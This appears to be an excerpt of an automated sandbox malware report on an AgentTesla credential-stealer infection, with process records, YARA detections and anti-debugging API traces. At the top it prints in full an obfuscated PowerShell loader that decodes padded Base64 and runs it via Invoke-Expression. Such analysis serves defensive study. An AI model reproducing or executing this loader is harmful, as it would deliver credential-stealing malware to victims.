shacksZQB0slanshacksFMslanshacksdslanshacksByslanshacksGkslanshacksbgBnslanshacksCgslanshacksJslanshacksBzslanshacksGMslanshacksbwB1slanshacksHIslanshackscwBlslanshacksCkslanshacksOwslanshackskslanshacksGMslanshackseQB0slanshacksG8slanshacksbQBlslanshacksHQslanshacksZQByslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksPslanshacksslanshacks8slanshacksEIslanshacksQQBTslanshacksEUslanshacksNgslanshacks0slanshacksF8slanshacksUwBUslanshacksEEslanshacksUgBUslanshacksD4slanshacksPgslanshacksnslanshacksDsslanshacksJslanshacksB0slanshacksHYslanshacksaQB4slanshacksGIslanshacksbwB4slanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksPslanshacksslanshacks8slanshacksEIslanshacksQQBTslanshacksEUslanshacksNgslanshacks0slanshacksF8slanshacksRQBOslanshacksEQslanshacksPgslanshacks+slanshacksCcslanshacksOwslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshackscgBhslanshacksGQslanshacksaQBvslanshacksHMslanshackseQBtslanshacksG0slanshacksZQB0slanshacksHIslanshackseQslanshacksuslanshacksEkslanshacksbgBkslanshacksGUslanshackseslanshacksBPslanshacksGYslanshacksKslanshacksslanshackskslanshacksGMslanshackseQB0slanshacksG8slanshacksbQBlslanshacksHQslanshacksZQByslanshacksCkslanshacksOwslanshackskslanshacksHQslanshacksZQB0slanshacksHIslanshacksYQBzslanshacksHQslanshacksaQBjslanshacksGgslanshacksbwB1slanshacksHMslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksJslanshacksByslanshacksGEslanshacksZslanshacksBpslanshacksG8slanshackscwB5slanshacksG0slanshacksbQBlslanshacksHQslanshackscgB5slanshacksC4slanshacksSQBuslanshacksGQslanshacksZQB4slanshacksE8slanshacksZgslanshacksoslanshacksCQslanshacksdslanshacksB2slanshacksGkslanshackseslanshacksBislanshacksG8slanshackseslanshacksslanshackspslanshacksDsslanshacksJslanshacksBoslanshacksG8slanshacksbQBvslanshacksHslanshacksslanshacksbslanshacksBhslanshacksHMslanshacksdslanshacksslanshacksgslanshacksC0slansh
acksZwBlslanshacksCslanshacksslanshacksMslanshacksslanshacksgslanshacksC0slanshacksYQBuslanshacksGQslanshacksIslanshacksslanshackskslanshacksHQslanshacksZQB0slanshacksHIslanshacksYQBzslanshacksHQslanshacksaQBjslanshacksGgslanshacksbwB1slanshacksHMslanshacksIslanshacksslanshackstslanshacksGcslanshacksdslanshacksslanshacksgslanshacksCQslanshacksaslanshacksBvslanshacksG0slanshacksbwBwslanshacksGwslanshacksYQBzslanshacksHQslanshacksOwslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCslanshacksslanshacksKwslanshacks9slanshacksCslanshacksslanshacksJslanshacksBjslanshacksHkslanshacksdslanshacksBvslanshacksG0slanshacksZQB0slanshacksGUslanshackscgslanshacksuslanshacksEwslanshacksZQBuslanshacksGcslanshacksdslanshacksBoslanshacksDsslanshacksJslanshacksByslanshacksGUslanshacksZwByslanshacksGUslanshackscwBzslanshacksGkslanshacksdgBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksdslanshacksBlslanshacksHQslanshackscgBhslanshacksHMslanshacksdslanshacksBpslanshacksGMslanshacksaslanshacksBvslanshacksHUslanshackscwslanshacksgslanshacksC0slanshacksIslanshacksslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksDsslanshacksJslanshacksBislanshacksGEslanshacksbslanshacksBkslanshacksG4slanshacksZQBzslanshacksHMslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksJslanshacksByslanshacksGEslanshacksZslanshacksBpslanshacksG8slanshackscwB5slanshacksG0slanshacksbQBlslanshacksHQslanshackscgB5slanshacksC4slanshacksUwB1slanshacksGIslanshackscwB0slanshacksHIslanshacksaQBuslanshacksGcslanshacksKslanshacksslanshackskslanshacksGgslanshacksbwBtslanshacksG8slanshackscslanshacksBsslanshacksGEslanshackscwB0slanshacksCwslanshacksIslanshacksslanshackskslanshacksHIslanshacksZQBnslanshacksHIslanshacksZQBzslanshacksHMslanshacksaQB2slanshacksGUslanshacksKQslanshacks7slanshacksCQslanshacksYQBuslanshacksHQslanshacksaQBzslanshacksGkslanshackscslanshacksBoslanshacksG8slansha
cksbgBhslanshacksGwslanshacksIslanshacksslanshacks9slanshacksCslanshacksslanshacksWwBTslanshacksHkslanshackscwB0slanshacksGUslanshacksbQslanshacksuslanshacksEMslanshacksbwBuslanshacksHYslanshacksZQByslanshacksHQslanshacksXQslanshacks6slanshacksDoslanshacksRgByslanshacksG8slanshacksbQBCslanshacksGEslanshackscwBlslanshacksDYslanshacksNslanshacksBTslanshacksHQslanshackscgBpslanshacksG4slanshacksZwslanshacksoslanshacksCQslanshacksYgBhslanshacksGwslanshacksZslanshacksBuslanshacksGUslanshackscwBzslanshacksCkslanshacksOwslanshackskslanshacksG8slanshackscgBsslanshacksGEslanshacksZwBlslanshacksCslanshacksslanshacksPQslanshacksgslanshacksFsslanshacksUwB5slanshacksHMslanshacksdslanshacksBlslanshacksG0slanshacksLgBSslanshacksGUslanshacksZgBsslanshacksGUslanshacksYwB0slanshacksGkslanshacksbwBuslanshacksC4slanshacksQQBzslanshacksHMslanshacksZQBtslanshacksGIslanshacksbslanshacksB5slanshacksF0slanshacksOgslanshacks6slanshacksEwslanshacksbwBhslanshacksGQslanshacksKslanshacksslanshackskslanshacksGEslanshacksbgB0slanshacksGkslanshackscwBpslanshacksHslanshacksslanshacksaslanshacksBvslanshacksG4slanshacksYQBsslanshacksCkslanshacksOwslanshackskslanshacksGMslanshacksZQBuslanshacksHQslanshackscgBhslanshacksGwslanshacksaQBzslanshacksGUslanshacksZslanshacksslanshacksgslanshacksD0slanshacksIslanshacksBbslanshacksGQslanshacksbgBsslanshacksGkslanshacksYgslanshacksuslanshacksEkslanshacksTwslanshacksuslanshacksEgslanshacksbwBtslanshacksGUslanshacksXQslanshacksuslanshacksEcslanshacksZQB0slanshacksE0slanshacksZQB0slanshacksGgslanshacksbwBkslanshacksCgslanshacksJwBWslanshacksEEslanshacksSQslanshacksnslanshacksCkslanshacksLgBJslanshacksG4slanshacksdgBvslanshacksGsslanshacksZQslanshacksoslanshacksCQslanshacksbgB1slanshacksGwslanshacksbslanshacksslanshackssslanshacksCslanshacksslanshacksWwBvslanshacksGIslanshacksagBlslanshacksGMslanshacksdslanshacksBbslanshacksF0slanshacksXQslanshacksgslanshacksEslanshacksslanshacksKslanshacksslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slans
hacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwslanshacksnslanshacksCwslanshacksJwBNslanshacksFMslanshacksQgB1slanshacksGkslanshacksbslanshacksBkslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksCcslanshacksLslanshacksslanshacksnslanshacksDIslanshacksJwslanshackspslanshacksCkslanshacks'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('slanshacks','A'))); Invoke-Expression $OWjuxd""
                                                                                      Imagebase:0x7ff7016f0000
                                                                                      File size:452'608 bytes
                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:16:48:51
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff62fc20000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:10
                                                                                      Start time:16:49:02
                                                                                      Start date:23/03/2025
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                      Imagebase:0xc30000
                                                                                      File size:262'432 bytes
                                                                                      MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2482251027.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2473875067.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2482251027.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Executed Functions


                                                                                      Execution Graph


                                                                                      Execution Coverage:11.2%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.1%
                                                                                      Total number of Nodes:13
                                                                                      Total number of Limit Nodes:2
                                                                                      execution_graph 25433 6819f40 25436 6819f68 25433->25436 25434 6819f4e 25437 6819f85 25436->25437 25438 6819fad 25436->25438 25437->25434 25439 6819fce 25438->25439 25440 681a096 GlobalMemoryStatusEx 25438->25440 25439->25434 25441 681a0c6 25440->25441 25441->25434 25442 2d770b0 25443 2d770f4 CheckRemoteDebuggerPresent 25442->25443 25444 2d77136 25443->25444 25445 681ef98 DuplicateHandle 25446 681f02e 25445->25446

                                                                                      Executed Functions

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1264 2d770b0-2d77134 CheckRemoteDebuggerPresent 1266 2d77136-2d7713c 1264->1266 1267 2d7713d-2d77178 1264->1267 1266->1267
                                                                                      APIs
                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02D77127
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2481596190.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_2d70000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 8143320ae88a1cc726c7a88c2e12c4b18d3934b7472f50dcdda491efb1907623
                                                                                      • Instruction ID: 947990681c15a0e8c9544dd95203cf002b7c30f73d0fed298024b8d74b6706af
                                                                                      • Opcode Fuzzy Hash: 8143320ae88a1cc726c7a88c2e12c4b18d3934b7472f50dcdda491efb1907623
                                                                                      • Instruction Fuzzy Hash: A92116B1900259CFDB14CF9AD444BEEFBF4AF48210F14845AE855A7350D778A944CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1089 6819f68-6819f83 1090 6819f85-6819fac call 68196fc 1089->1090 1091 6819fad-6819fcc call 6819708 1089->1091 1097 6819fd2-681a031 1091->1097 1098 6819fce-6819fd1 1091->1098 1105 681a033-681a036 1097->1105 1106 681a037-681a0c4 GlobalMemoryStatusEx 1097->1106 1111 681a0c6-681a0cc 1106->1111 1112 681a0cd-681a0f5 1106->1112 1111->1112
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52bc6ddc04531d464a3ac170cb09414eff4910d37b5eec98e9c011f9eab82199
                                                                                      • Instruction ID: 6db710e0fc646cfb668c968b4e1e75bdd63951a8b0e8756a0279fd68afa1a247
                                                                                      • Opcode Fuzzy Hash: 52bc6ddc04531d464a3ac170cb09414eff4910d37b5eec98e9c011f9eab82199
                                                                                      • Instruction Fuzzy Hash: F9514471D083968FCB15CF79D81069EBFF4AF86220F1486ABD194EB292DB749841CBD1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1247 681ef90-681ef95 1248 681ef97 1247->1248 1249 681ef78-681ef84 1247->1249 1250 681ef98-681f02c DuplicateHandle 1248->1250 1252 681f035-681f052 1250->1252 1253 681f02e-681f034 1250->1253 1253->1252
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0681F01F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: ad7148b56ac3bbc6ff403fd72525046ff71bf9a7ab0c47fcaa7a9958394043a5
                                                                                      • Instruction ID: 607e358a1b9d5f2ba6b3b573eb26cacbb75cf8c1338f3a9833a8c9b1b4e4c9d4
                                                                                      • Opcode Fuzzy Hash: ad7148b56ac3bbc6ff403fd72525046ff71bf9a7ab0c47fcaa7a9958394043a5
                                                                                      • Instruction Fuzzy Hash: 0321F8B5D003499FDB10CF9AD884ADEBBF9EB48320F14841AE914E7350D375A954CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1257 2d770a8-2d77134 CheckRemoteDebuggerPresent 1260 2d77136-2d7713c 1257->1260 1261 2d7713d-2d77178 1257->1261 1260->1261
                                                                                      APIs
                                                                                      • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 02D77127
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2481596190.0000000002D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_2d70000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                      • String ID:
                                                                                      • API String ID: 3662101638-0
                                                                                      • Opcode ID: 56e085ac5115dac7edf947e8326b6ef7974acdf7cf1bf5d03f0ecbd0011f1ffb
                                                                                      • Instruction ID: 0f5d1dfce3e7a85aee48dc09616876721b78817973478203176edb125e9cfd2b
                                                                                      • Opcode Fuzzy Hash: 56e085ac5115dac7edf947e8326b6ef7974acdf7cf1bf5d03f0ecbd0011f1ffb
                                                                                      • Instruction Fuzzy Hash: D22136B2800259CFDB10CF9AD884BEEFBF4EF49220F14841AE855A7341D778A944CFA1

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1270 681ef98-681f02c DuplicateHandle 1271 681f035-681f052 1270->1271 1272 681f02e-681f034 1270->1272 1272->1271
                                                                                      APIs
                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0681F01F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: DuplicateHandle
                                                                                      • String ID:
                                                                                      • API String ID: 3793708945-0
                                                                                      • Opcode ID: b36823c71f104ecba8330f9fd7a0893e2220ab5ee507208d18dfb5980d638792
                                                                                      • Instruction ID: d89d9f33a38f1eec245cf521dccde87d004838361195479482fd72e572468162
                                                                                      • Opcode Fuzzy Hash: b36823c71f104ecba8330f9fd7a0893e2220ab5ee507208d18dfb5980d638792
                                                                                      • Instruction Fuzzy Hash: 2021C4B5D00249DFDB10CF9AD984ADEBBF9EB48310F14841AE918A7350D379A944CFA5

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1276 681a050-681a08e 1277 681a096-681a0c4 GlobalMemoryStatusEx 1276->1277 1278 681a0c6-681a0cc 1277->1278 1279 681a0cd-681a0f5 1277->1279 1278->1279
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 0681A0B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.2501589335.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_10_2_6810000_MSBuild.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: fe6817ad0ab7a0e175741e2238a12764bc5596ce477fe0127d7b2bda2a5d4b75
                                                                                      • Instruction ID: abc4da597c79d7b8acd96f3ca295f798758013d6cde931918bddc59991e52bcb
                                                                                      • Opcode Fuzzy Hash: fe6817ad0ab7a0e175741e2238a12764bc5596ce477fe0127d7b2bda2a5d4b75
                                                                                      • Instruction Fuzzy Hash: BD1112B1C00659DFDB14CF9AC544BDEFBF4EB48220F14812AD818A7240D378A944CFA5